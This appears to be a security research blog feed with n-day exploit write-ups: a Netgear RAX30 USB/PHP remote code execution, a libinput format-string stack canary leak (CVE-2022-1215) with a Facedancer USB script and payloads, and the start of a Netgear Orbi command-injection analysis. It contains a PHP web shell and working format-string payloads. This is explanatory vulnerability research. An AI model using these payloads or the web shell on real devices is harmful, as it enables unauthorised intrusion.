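<p>For example, <code class="language-plaintext highlighter-rouge">plant_symlink("/mnt/usb", "passwd_link")</code> would create <code class="language-plaintext highlighter-rouge">/mnt/usb/passwd_link</code> pointing at <code class="language-plaintext highlighter-rouge">/var/passwd</code>.</p>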

<h3 id="rce-via-php-files">RCE via PHP Files</h3>

<p>To test the assumption regarding PHP files mounted via USB being executable, I used the same USB stick, this time simply creating a PHP file to execute <code class="language-plaintext highlighter-rouge">phpinfo();</code> as a simple way to confirm execution. This worked as expected and the PHP info output was shown on the page. I then created a simple PHP page that would allow me to pass shell commands in a URL parameter for easy shell access.</p>

<p>PHP shell command proxy:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> <span class="nb">system</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span> <span class="cp">?&gt;</span>
</code></pre></div></div>
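
<p>Commands passed through a URL parameter like this need to be URL-encoded, otherwise spaces and shell metacharacters get mangled. A small helper along the following lines handles that. The router IP and PHP file name are placeholders, and the exact path under <code class="language-plaintext highlighter-rouge">/shares</code> is an assumption that depends on how the drive is exposed.</p>

```python
from urllib.parse import quote, urlencode


def build_cmd_url(router_ip, php_path, command):
    """Build the request URL for a PHP command proxy served from /shares."""
    # urlencode percent-encodes shell metacharacters and turns spaces into '+'.
    query = urlencode({"cmd": command})
    return f"http://{router_ip}/shares/{quote(php_path)}?{query}"
```

<p>With placeholder values, <code class="language-plaintext highlighter-rouge">build_cmd_url("192.168.1.1", "shell.php", "id; uname -a")</code> returns <code class="language-plaintext highlighter-rouge">http://192.168.1.1/shares/shell.php?cmd=id%3B+uname+-a</code>.</p>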

<p>Finally, I used this to have the device download a shell script over HTTP from my machine to open a reverse shell:</p>

<p><img src="/assets/images/poc-rax30-shell.png" alt="poc-rax30-shell.png" /></p>

<h2 id="conclusion">Conclusion</h2>

<p>This turned out to be a fun exercise, and some of my prior experience with Netgear devices proved to be useful.</p>

<p>The <code class="language-plaintext highlighter-rouge">soap_serverd</code> issue was exploited during the latest Pwn2Own as part of a longer exploit chain that eventually resulted in RCE, though direct exploitation seems infeasible due to the presence of stack canaries.</p>

<p>For the <code class="language-plaintext highlighter-rouge">lighttpd</code> issue, exploitation requires physical access to the device, at least long enough to plug in the USB drive and send the necessary requests. This isn’t infeasible, though considering these routers are primarily used in SOHO settings this may not be quite as critical as a fully remote RCE.</p>

<h1 id="referenceslinks">References/Links</h1>

<ul>
  <li><a href="https://www.netgear.com/support/product/rax30#download">Netgear RAX30 firmware</a></li>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-499/">ZDI-23-499 - soap_serverd buffer overflow</a></li>
  <li><a href="https://www.zerodayinitiative.com/advisories/ZDI-23-496/">ZDI-23-496 - Lighttpd misconfiguration</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="nday" /><category term="ndays" /><category term="patchdiff" /><category term="rax30" /><category term="exploit" /><category term="zdi-23-499" /><summary type="html"><![CDATA[patch diff analysis of the latest patches for the netgear rax30 and an nday exploit for one of them (ZDI-23-496)]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/poc-rax30-shell.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/poc-rax30-shell.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)</title><link href="https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html" rel="alternate" type="text/html" title="nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)" /><published>2022-08-04T00:00:00+00:00</published><updated>2022-08-04T00:00:00+00:00</updated><id>https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak</id><content type="html" xml:base="https://blog.coffinsec.com/nday/2022/08/04/CVE-2022-1215-libinput-fmt-canary-leak.html"><![CDATA[<p>At the end of last year I stumbled on a crash in Xorg while playing with the <a href="https://greatscottgadgets.com/greatfet/one/">GreatFET One</a> but never really got around to follow up on it. Then a few weeks ago, I decided to finally root cause the issue and while in the middle of doing so I discovered that the issue had been reported and fixed only 3 months ago. Since I’d already started working on it though, I decided to just move onto writing some exploits. In this post I walk through the details of writing an exploit to leak the stack canary.</p>

<h2 id="discovery">Discovery</h2>

<p>This is an issue that I had independently discovered in Xorg (or so I thought) a while back while messing around with the <a href="https://greatscottgadgets.com/greatfet/one/">GreatFET One</a>, a cool little device for USB hacking. While trying out some random payloads I found that connecting a USB keyboard device with format strings in certain device descriptor fields caused Xorg to crash. Specifically, it was the manufacturer, serial, and product string fields. Unfortunately, I quickly ran into issues while trying to set up a testing environment as I would immediately crash my own X session as soon as I connected the device, even when trying to pass it through to a VM directly. I decided to just save it for another day when I had time to figure out a good solution to those issues, but it ended up sitting for months and I never got around to going back to it.</p>

<p>Then, a couple of weeks ago I saw some CVEs get released for something in Xorg that seemed tangentially related to input devices, which piqued my interest. It got me wondering whether it was the same bug I had found, so I dug up my notes and decided to take a closer look. While doing this I figured out that the issue was actually not in Xorg itself (at least not completely), but in <code class="language-plaintext highlighter-rouge">libinput</code>. Once I’d figured this out, I went looking for the libinput source code to find the code for the functions I was seeing in the backtrace and ended up finding the <a href="https://gitlab.freedesktop.org/libinput/libinput/-/issues/752">specific issue</a> where the bug was reported and then fixed in April of this year. Well, shit lmao.</p>

<h2 id="root-cause-analysis">Root Cause Analysis</h2>

<p>The reporter of the issue provided a detailed description of the vulnerability in the report. Here’s a snippet that’s a good tl;dr:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>- Newly connected evdev devices are logged using evdev_log_msg.
- The format parameter is manipulated at src/evdev.h:785 to prepend (among other things) the device name.
- The resulting string buf is then passed as the format parameter to log_msg_va at src/evdev.h:796
- In X.org (and probably other users of libinput), this logging function eventually leads into the system's sprintf.
- If the device name contains printf-style formatting placeholders such as %s or %d, these will be passed on to the new format string, and interpreted incorrectly. User-controlled format strings are a known security vulnerability, CWE-134, and can be used by an attacker to execute malicious code.
</code></pre></div></div>

<p>Basically, the issue came down to the fact that user-controlled input was prepended to a predefined format string before being used as the format argument in a call to <code class="language-plaintext highlighter-rouge">sprintf()</code>.</p>

<p>While doing some more digging on specific components of libinput I came across the <a href="https://www.assured.se/posts/accidental-intrusion">blog post</a> where the reporter(s) talked about accidentally stumbling across the issue and their root causing process (no surprise, it’s actually a security company lol). Check out that post for a great analysis and description of exactly where the issue happens.</p>

<p>So, the root cause analysis was already done…but no poc exploit code was provided. There was an interesting discussion around the likelihood/plausibility of exploitation in the GitLab issue between the reporter(s) and developers where they discussed potential avenues for exploitation and the true impact/risk (check it out for details). tl;dr the determination was that at best the bug provides an attacker with an info leak and nothing else but at worst could <em>potentially</em> lead to code execution.</p>

<p>With that in mind, I thought it still might be worth doing the work of exploring both the info leak and the potential for RCE and (hopefully) producing exploits for both.</p>

<h2 id="exploit-leaking-the-stack-canary">Exploit: Leaking the Stack Canary</h2>

<p>I started off with the info leak exploit. One of the most useful things an info leak can provide is the ability to leak the stack canary so I decided that would be the goal of the exploit. Because the canary value is stored on the stack and format string arguments are read from the stack, it’s usually possible to do this pretty easily.</p>

<p>Testing environment:</p>
<ul>
  <li>Debian 11 host</li>
  <li>Xubuntu 20.04 VM in Virtualbox</li>
  <li>USB host device passthrough to the VM</li>
  <li>Set up SSH on VM</li>
</ul>

<p>First things first, though: in order for a format string to be useful for this kind of info leak, there needs to be a way to get output back from the program that shows the values read from the stack. Thankfully, in this case, the output is written to the Xorg log file, which is world-readable. With that confirmed, the next step was figuring out exactly where the stack canary was so we could find it reliably.</p>

<h3 id="constraints-field-length-limit">Constraints: Field Length Limit</h3>

<p>In this case, there were some constraints that made things only slightly harder. Each field can hold at most 126 characters. This is because a USB string descriptor can be at most 255 bytes long, the first 2 of which are reserved for the descriptor’s length and type. The string values are encoded as UTF-16 as per the USB specification, so the remaining 253 bytes have room for 126 two-byte characters.</p>
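
<p>The character limit falls straight out of the USB string descriptor layout: a one-byte length field, a one-byte descriptor type, then the UTF-16LE text. The sketch below works through that arithmetic. The constant and function names are my own for illustration and are not taken from Facedancer.</p>

```python
USB_DT_STRING = 0x03       # bDescriptorType value for string descriptors
MAX_DESCRIPTOR_LEN = 255   # bLength is a single byte
HEADER_LEN = 2             # bLength + bDescriptorType


def max_string_chars():
    """Largest number of UTF-16 code units that fit in one string descriptor."""
    return (MAX_DESCRIPTOR_LEN - HEADER_LEN) // 2


def build_string_descriptor(text):
    """Encode text as a USB string descriptor (header followed by UTF-16LE)."""
    encoded = text.encode("utf-16-le")
    if len(encoded) // 2 > max_string_chars():
        raise ValueError(f"string too long: at most {max_string_chars()} characters fit")
    return bytes([HEADER_LEN + len(encoded), USB_DT_STRING]) + encoded
```

<p>Here <code class="language-plaintext highlighter-rouge">max_string_chars()</code> evaluates to 126, and a 126-character ASCII payload produces a 254-byte descriptor.</p>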

<h3 id="constraint-additional-s-format-strings">Constraint: Additional %s format strings</h3>

<p>The first issue I ran into almost right away when I started testing payloads was that nearly every payload I tried immediately resulted in a SIGSEGV. It wasn’t immediately obvious why this was happening as it’s usually possible to use specifiers like <code class="language-plaintext highlighter-rouge">%x</code> to read values without causing a crash (i.e. doesn’t usually lead to OOB read).</p>

<p>The cause turned out to be one of the calls to <code class="language-plaintext highlighter-rouge">*sprintf_internal</code>: the format strings I was submitting were being prepended to another string that contained another 11 <code class="language-plaintext highlighter-rouge">%s</code> specifiers, as shown in the GDB output below:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 1 <span class="s2">"Xorg"</span> hit Breakpoint 1, __vsnprintf_internal <span class="o">(</span><span class="nv">string</span><span class="o">=</span>0x7ffce6903d65 <span class="s2">""</span>, <span class="nv">maxlen</span><span class="o">=</span>0x3fb, <span class="nv">format</span><span class="o">=</span>0x7ffce69041c0 <span class="s2">"event7  - CCCC &lt;CONTROLLED INPUT&gt;: is tagged by udev as:%s%s%s%s%s%s%s%s%s%s%s</span><span class="se">\n</span><span class="s2">"</span>, <span class="nv">args</span><span class="o">=</span>0x7ffce69041a8, <span class="nv">mode_flags</span><span class="o">=</span>0x2<span class="o">)</span> at vsnprintf.c:95
</code></pre></div></div>

<p>This is a problem because each format specifier placed in the controllable strings will consume an argument from the stack and <code class="language-plaintext highlighter-rouge">%s</code> format specifiers indicate the argument value will be treated as a char pointer and dereferenced as such; once the arguments for each format spec in the submitted payload were consumed, it became virtually impossible to avoid triggering a segmentation fault caused by a read to an invalid address when the <code class="language-plaintext highlighter-rouge">%s</code> specs were reached.</p>

<p>After doing a bit of reading through the man pages for sprintf and some Google searches, I figured out I could use direct parameter access on the format specs in my payload to keep the <code class="language-plaintext highlighter-rouge">va_arg</code> pointer fixed. Using parameter access in the format specs does not move the main argument pointer (at least in glibc; POSIX leaves the result of mixing numbered and unnumbered specs undefined), so in a format string such as <code class="language-plaintext highlighter-rouge">%1$x %2$x %x</code>, the first format reads from parameter 1 and the second from parameter 2, but the third reads from <em>parameter 1</em> again because it’s the first format spec to appear without a parameter specified. The example below shows this in action:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xorg@xuxorg:~<span class="nv">$ </span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"%1</span><span class="se">\$</span><span class="s2">s%2</span><span class="se">\$</span><span class="s2">s%3</span><span class="se">\$</span><span class="s2">s%4</span><span class="se">\$</span><span class="s2">s"</span> | ./toy
<span class="o">[</span>+] <span class="nb">fmt </span>string: <span class="s1">'%1$s%2$s%3$s%4$s | %s%s%s%s\n'</span>
<span class="o">[</span>+] args: <span class="s1">'1111.'</span>, <span class="s1">'4444.'</span>, <span class="s1">'5555.'</span>, <span class="s1">'6666.'</span>

<span class="o">[</span>+] result:
1111.4444.5555.6666. | 1111.4444.5555.6666.
</code></pre></div></div>

<p>This is how I was able to get around the issues with the extra <code class="language-plaintext highlighter-rouge">%s</code> specs, but it cut down the total number of format specifiers I could place in a single field. There were a total of 126 characters that could be used and each normal format spec (without a parameter index) takes up 2 characters, resulting in a total of 63 format specs that could be inserted. The addition of the parameter access syntax adds a minimum of 2 characters per format spec. Assuming only single-digit indices are used (4 characters total), this cuts down the actual max number of specs that could be included in each field to 31. This means for each run of the ‘exploit’ we’ll only be able to read a total of 31 values off of the stack.</p>

<p>Those already familiar with format string bugs would normally be correct to assume that this length limit isn’t necessarily an issue since it doesn’t limit how <em>far</em> into the stack we’re able to read. This is because the set of parameter indices can be updated between runs (e.g. run1 uses indices 1-20, run2 uses indices 20-40, etc) to continue reading further into memory. Unfortunately, this is one of the cases where the length limit is very <em>much</em> an issue, as I quickly discovered when I tried to do that.</p>

<h3 id="constraints-fortify_source2">Constraints: FORTIFY_SOURCE=2</h3>

<p><img src="/assets/images/checksec.png" alt="checksec" /></p>

<p>While doing some testing and trying to dump out values I noticed that any time I used parameter access format specs that didn’t include all indices below the max index used (i.e. if a format string accessed parameter 5 without accessing 1-4) the application would crash with a SIGABRT. When investigating this with GDB attached, I noticed this string in the handler that raises the abort signal: <code class="language-plaintext highlighter-rouge">"*** invalid %N$ use detected ***\n"</code>. A quick Google search later led me to figure out that the Xorg binary I was testing against was compiled with the <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code> flag.</p>

<h3 id="a-quick-detour-tldr-on-fortify_source2">a quick detour: tl;dr on FORTIFY_SOURCE=2</h3>

<p>I wasn’t familiar with the specific mitigations/checks provided by this flag before this so I spent a bit of time digging into it. I’ll probably spend more time talking about this in a future post so for now here’s the tl;dr version with the most important points:</p>

<ul>
  <li>Compiler-provided security checks and exploit mitigation mechanisms (just like <code class="language-plaintext highlighter-rouge">-fstack-protector</code>)</li>
  <li>This includes both compile-time and run-time checks</li>
  <li><code class="language-plaintext highlighter-rouge">=2</code> specifically enables format string exploit mitigations; requires compiling with optimization enabled (<code class="language-plaintext highlighter-rouge">-O1</code> or higher)
    <ul>
      <li><code class="language-plaintext highlighter-rouge">%n</code> is not allowed in format strings stored in writeable memory (i.e. don’t allow from user-writeable memory regions)</li>
      <li>Direct parameter access cannot ‘skip’ values; if the 5th parameter is accessed directly, parameters 1-4 must also be accessed somewhere in the format string</li>
    </ul>
  </li>
</ul>

<p>That last point is the pertinent one in regard to the issue mentioned at the end of the previous section. This meant that the length limit would effectively create a maximum parameter index that could be accessed while remaining within the boundaries of the constraints and avoiding a crash.</p>
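
<p>To sanity-check a payload against the no-skipping rule before sending it, a rough model of the check is enough. The sketch below is not glibc’s implementation, just an approximation of the rule as described above: it collects the numbered indices a format string uses and reports any index below the maximum that is never referenced. It ignores corner cases such as <code class="language-plaintext highlighter-rouge">%%</code> and <code class="language-plaintext highlighter-rouge">*m$</code> width arguments.</p>

```python
import re

# Matches the index in numbered conversions such as %5$x or %12$p.
POSITIONAL_SPEC = re.compile(r"%(\d+)\$")


def skipped_indices(fmt):
    """Return the indices below the highest one used that fmt never references."""
    used = {int(index) for index in POSITIONAL_SPEC.findall(fmt)}
    if not used:
        return []
    return [i for i in range(1, max(used) + 1) if i not in used]
```

<p>A payload is expected to survive the check only when <code class="language-plaintext highlighter-rouge">skipped_indices(payload)</code> comes back empty; for <code class="language-plaintext highlighter-rouge">"%5$x"</code> it reports indices 1 through 4 as missing.</p>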

<p>We can calculate the max index like so:</p>

<ul>
  <li>Accessing a single-digit index consumes 4 characters per spec: <code class="language-plaintext highlighter-rouge">%N$x</code>
    <ul>
      <li>Accessing arguments 1-9 consumes 36 characters total  (<code class="language-plaintext highlighter-rouge">9 * 4</code>)</li>
    </ul>
  </li>
  <li>Accessing a double-digit index (10 to 99) consumes 5 characters per spec: <code class="language-plaintext highlighter-rouge">%NN$x</code>
    <ul>
      <li>With 90 characters remaining (<code class="language-plaintext highlighter-rouge">126 - 36</code>), a maximum of 18 more arguments can be accessed (<code class="language-plaintext highlighter-rouge">90 / 5</code>)</li>
    </ul>
  </li>
  <li>Maximum index is 9 + 18 = 27</li>
</ul>
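
<p>The same calculation can be done programmatically, which is handy when experimenting with separators or different conversion characters. This is a small sketch with helper names of my own choosing; it assumes one-character conversions and no separators between specs.</p>

```python
def max_contiguous_index(budget, conversion="x"):
    """Highest index N such that specs for 1..N all fit within budget characters."""
    used = 0
    index = 0
    while True:
        spec = f"%{index + 1}${conversion}"
        if used + len(spec) > budget:
            return index
        used += len(spec)
        index += 1


def build_payload(last_index, conversion="p"):
    """Concatenate numbered specs for every index from 1 through last_index."""
    return "".join(f"%{i}${conversion}" for i in range(1, last_index + 1))
```

<p>With a budget of 126 characters, <code class="language-plaintext highlighter-rouge">max_contiguous_index(126)</code> gives 27, and <code class="language-plaintext highlighter-rouge">build_payload(27)</code> is exactly 126 characters long.</p>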

<h3 id="exploit-leaking-the-canary">Exploit: Leaking the Canary</h3>

<p>Given the constraints described above, the exploit ultimately comes down to a bit of luck —  as long as the canary is close enough on the stack to be reachable with the available parameter indices for the vulnerable stack frame, it should be leaked in the log file.</p>

<p>I began with this payload, which only reads up to the 22nd arg so that the <code class="language-plaintext highlighter-rouge">.</code>’s between the specs can be included to split things up and make the outputs easy to distinguish.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sh">"</span><span class="s">%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p.%8$p.%9$p.%10$p.%11$p.%12$p.%13$p.%14$p.%15$p.%16$p.%17$p.%18$p.%19$p.%20$p.%21$p.%22$p</span><span class="sh">"</span>
</code></pre></div></div>

<p>Unfortunately, that didn’t work and none of the values in the output matched the pattern of a canary. So, it would come down to the last 5 args. I removed the dots from the first 22 formats to get those characters back and read up to the 25th.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sh">"</span><span class="s">%1$p%2$p%3$p%4$p%5$p%6$p%7$p%8$p%9$p%10$p%11$p%12$p%13$p%14$p%15$p%16$p%17$p%18$p%19$p%20$p%21$p%22$p.%23$p.%24$p.%25$p</span><span class="sh">"</span>
</code></pre></div></div>

<p>Luck was on my side. I checked the logs and found what looked a lot like a canary value. As the log excerpt below shows, the value’s location on the stack changes slightly between different vulnerable function calls. Stack canaries on most 64-bit Linux distros are 64-bit numbers that end with a null byte. They’re usually not too difficult to find since they don’t look like valid addresses or hex ASCII values (except when they do).</p>

<p><img src="/assets/images/xorg-log-canary.png" alt="xorg log with canary values" /></p>
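
<p>Picking candidates out of the log by eye gets tedious, so a regex helps. The sketch below looks for <code class="language-plaintext highlighter-rouge">%p</code>-style values that are a full 16 hex digits long and end in <code class="language-plaintext highlighter-rouge">00</code>. It assumes the leaked values are separated by non-alphanumeric characters, and it will miss a canary whose top nibble happens to be zero, since <code class="language-plaintext highlighter-rouge">%p</code> drops leading zeros.</p>

```python
import re

# 0x followed by 14 hex digits and a trailing 00: a full-width 64-bit value
# whose least significant byte is null.
CANARY_RE = re.compile(r"\b0x[0-9a-f]{14}00\b")


def find_canary_candidates(log_text):
    """Return the unique canary-looking values found in log_text, sorted."""
    return sorted(set(CANARY_RE.findall(log_text)))
```

<p>Feeding it the contents of the Xorg log returns a short list of values to compare against the canary seen in a debugger.</p>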

<h4 id="facedancer-script">Facedancer Script</h4>

<p>Facedancer is the name of another USB hacking board similar to the GreatFET and a Python module that provides USB emulation capabilities for compatible boards. This is incredibly useful for quick prototyping and testing, especially being able to programmatically define how the device will behave in response to different requests sent by the host.</p>

<p>This Facedancer script will trigger the bug and place markers around the locations that are likely to contain the canary value to make it easier to find.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
# pylint: disable=unused-wildcard-import, wildcard-import
</span><span class="kn">import</span> <span class="n">sys</span>
<span class="kn">import</span> <span class="n">os</span>
<span class="kn">import</span> <span class="n">logging</span>
<span class="kn">from</span> <span class="n">facedancer</span>             <span class="kn">import</span> <span class="n">devices</span><span class="p">,</span> <span class="n">main</span>
<span class="kn">from</span> <span class="n">facedancer.devices.keyboard</span> <span class="kn">import</span> <span class="n">USBKeyboardDevice</span>

<span class="n">prefix</span> <span class="o">=</span> <span class="sh">"</span><span class="s">%1$c%2$c%3$c%4$c%5$c%6$c%7$c%8$c%9$c%10$c%11$c%12$c%13$c%14$c%15$c%16$c%17$c%18$c%19$c%20$c%21$c%22$c</span><span class="sh">"</span>
<span class="n">canary_maybes</span> <span class="o">=</span> <span class="sh">"</span><span class="s">X:%23$p_X:%24$p_X:%25$p</span><span class="sh">"</span> <span class="c1"># grep for `X:0x.{14}00`
</span><span class="n">payload</span> <span class="o">=</span> <span class="n">prefix</span> <span class="o">+</span> <span class="n">canary_maybes</span>

<span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">[+] reading args from $FSERIAL, $FPRODUCT, and $FMANU env vars</span><span class="sh">"</span><span class="p">)</span>
<span class="n">serial</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">FSERIAL</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">C</span><span class="sh">"</span><span class="o">*</span><span class="mi">100</span><span class="p">)</span>
<span class="n">product</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">FPRODUCT</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">HYPRODUCT</span><span class="sh">"</span><span class="p">)</span>
<span class="n">manu</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">FMANU</span><span class="sh">"</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

<span class="c1"># create the device and connect
</span><span class="n">DEVICE</span> <span class="o">=</span> <span class="nc">USBKeyboardDevice</span><span class="p">()</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">serial_number_string</span> <span class="o">=</span> <span class="n">serial</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">manufacturer_string</span> <span class="o">=</span> <span class="n">manu</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">product_string</span> <span class="o">=</span> <span class="n">product</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">product_id</span> <span class="o">=</span> <span class="mh">0x1337</span>
<span class="n">DEVICE</span><span class="p">.</span><span class="n">vendor_id</span> <span class="o">=</span> <span class="mh">0x1337</span>
<span class="nf">main</span><span class="p">(</span><span class="n">DEVICE</span><span class="p">)</span>
</code></pre></div></div>

<p>The values can then be searched for in the Xorg log file using grep:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># find it in the logs</span>
<span class="nb">grep</span> <span class="nt">-a</span> <span class="nt">-E</span> <span class="s2">"X:0x.{14}00"</span> /var/log/Xorg.0.log
</code></pre></div></div>
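<p>The same search can be done in Python when the values need to be pulled out as integers. This is a rough sketch: the sample line is made up for illustration, and restricting the match to hex digits is a tightening I added on top of the grep pattern, which uses <code class="language-plaintext highlighter-rouge">.</code>.</p>

```python
import re

# Mirrors the grep pattern: the "X:" marker, "0x", 14 characters, then "00".
# The lookahead rejects longer hex strings that merely contain such a run.
CANARY_RE = re.compile(r"X:(0x[0-9a-f]{14}00)(?![0-9a-f])")


def find_canary_candidates(text):
    """Return every marked value in text that has the shape of a canary."""
    return [int(value, 16) for value in CANARY_RE.findall(text)]


# Made-up example of what a marked log line could look like.
sample = "X:0x7ffd1234abcd_X:0x3a5f9c21d4e8b700_X:(nil)"
print([hex(v) for v in find_canary_candidates(sample)])
```

<p>To run it against the real log, read the file with something like <code class="language-plaintext highlighter-rouge">open(path, errors="replace").read()</code>, since the log can contain non-text bytes (which is also why the grep above uses <code class="language-plaintext highlighter-rouge">-a</code>).</p>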

<p>The screenshot below shows the canary value in the running Xorg process while attached with GDB and the same value shown in the Xorg log:</p>

<p><img src="/assets/images/gdb-canary-confirm.png" alt="gdb confirm" /></p>

<p>This has only been confirmed to work on default installations of Xubuntu 20.04.4 (i.e. before installing any updates, as patches have been pushed). I did test on a Debian 11 system but wasn’t able to get the canary value to leak within the same constraints. Apparently, most distros now enable essentially all exploit mitigations (canaries, RELRO, FORTIFY_SOURCE, etc) on default packages. So, YMMV on different distros or even Ubuntu versions.</p>

<h2 id="code-exec">Code Exec?</h2>

<p>I spent quite a bit of time trying to see whether I could turn this into a code execution bug, but as mentioned above, the FORTIFY_SOURCE=2 checks prevent the use of <code class="language-plaintext highlighter-rouge">%n</code>, which really complicates things. The only bypass technique I’ve been able to find is from a 2010 Phrack article, “A Eulogy for Format Strings”, which involves abusing the use of <code class="language-plaintext highlighter-rouge">alloca</code> in glibc’s internal vfprintf implementation to shift the stack and cause a 4-byte NULL write at a controllable location. This NULL write is used to overwrite the flag on the open file stream object for stdout which is used to determine whether to enforce the FORTIFY checks. I’m not sure whether that same behavior can be abused in modern glibc versions on 64-bit systems (pretty much everything I’ve found online is on 32-bit systems, and at least 6-7 years old) but I’m still playing around with it. I’ve been able to get some interesting behavior but nothing so far that’s gotten me closer to code exec in any significant way. In any case, I think it may be an area worth exploring, if only to confirm whether some bypass can be achieved on modern systems. If not, I may end up just building a vulnerable version without the fortify checks and writing an exploit for that.</p>

<p>So, for now, no code exec :(.</p>

<h2 id="referenceresources">Reference/Resources</h2>
<ul>
  <li><a href="https://gitlab.freedesktop.org/libinput/libinput/-/issues/752">libinput Gitlab Issue #752</a></li>
  <li><a href="https://www.assured.se/posts/accidental-intrusion">Accidental Intrusion, CVE-2022-1215</a> (blog post by the researcher(s) that reported the bug)</li>
  <li><a href="http://phrack.org/issues/67/9.html">A Eulogy for Format Strings (Phrack 0x43)</a></li>
  <li><a href="https://github.com/greatscottgadgets/Facedancer">Facedancer</a></li>
  <li><a href="https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/">Stack Canaries</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="nday" /><category term="cve-2022-1215" /><category term="libinput" /><category term="info-leak" /><category term="exploit" /><category term="nday" /><summary type="html"><![CDATA[a quick post on a format string bug in libinput I found last year but never got around to debugging, plus some exploit code to leak the stack canary on a default Xubuntu 20.04.4 system.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/xorg-log-canary.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/xorg-log-canary.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)</title><link href="https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861.html" rel="alternate" type="text/html" title="nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)" /><published>2022-07-02T00:00:00+00:00</published><updated>2022-07-02T00:00:00+00:00</updated><id>https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861</id><content type="html" xml:base="https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861.html"><![CDATA[<p>An unauthenticated command injection vulnerability in Netgear Orbi devices was reported to Netgear in December 2020 by ZDI. I wanted to learn more about the bug, but the details of the vulnerability were never released and there were no known exploits. Having spent the last year and a half looking at this system, I decided to try to find the bug myself and see if I could write a functional exploit. It was tougher than I expected, but I made it work in the end :)</p>

<h2 id="introduction">introduction</h2>

<p>As I’ve mentioned in previous posts, I’ve been hunting for bugs on the Netgear Orbi for about a year and a half. A few weeks ago, I came across an advisory for an unauthenticated command injection vulnerability that was reported to Netgear back in December 2020 and realized that the vulnerable firmware version was the same one that was installed on my device back when I first started looking for bugs on it. In fact, the issue had only been fixed about a month before then. If only I’d started looking just a little bit sooner! Since it was way too late for that, I thought it’d be fun to see if I could find where the vulnerability was located and write a functional exploit to gain full control of the device.</p>

<h2 id="initial-analysis">initial analysis</h2>

<p>There were no known exploits for this vulnerability at the time I started looking and the only useful information came from the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-27861">CVE entry</a> on Mitre:</p>

<blockquote>
  <p>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Orbi 2.5.1.16 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UA_Parser utility. A crafted Host Name option in a DHCP request can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11076.</p>

</blockquote>

<p>Even though it’s not much, this provided enough information to narrow things down to a specific binary and a specific input path. It would mostly come down to finding the bug and working up from there to trace the input back to the source.</p>

<h3 id="finding-the-vulnerability">finding the vulnerability</h3>

<p>With the info taken from the advisory, I moved on to analyzing the vulnerable version of <code class="language-plaintext highlighter-rouge">UA_Parser</code> to try to find where the vulnerability occurred. Since I knew this was command injection, the most likely suspect was insecure use of <code class="language-plaintext highlighter-rouge">system()</code> to execute commands. I loaded the binary up in Ghidra and used the symbol table to select <code class="language-plaintext highlighter-rouge">system()</code> and then used the Function Call Tree to check the functions that had incoming references to it. While doing this, I came across the following code snippet in one of these functions (annotated for clarity):</p>

<p><img src="/assets/images/orbi-nday/vulnerable.png" alt="vulnerable" /></p>

<p>This code stood out as a good candidate for command injection given that the argument passed to <code class="language-plaintext highlighter-rouge">system()</code> is a string constructed with what looked like user-controlled data. Additionally, the values are placed inside double quotes, which would allow for expansion.</p>

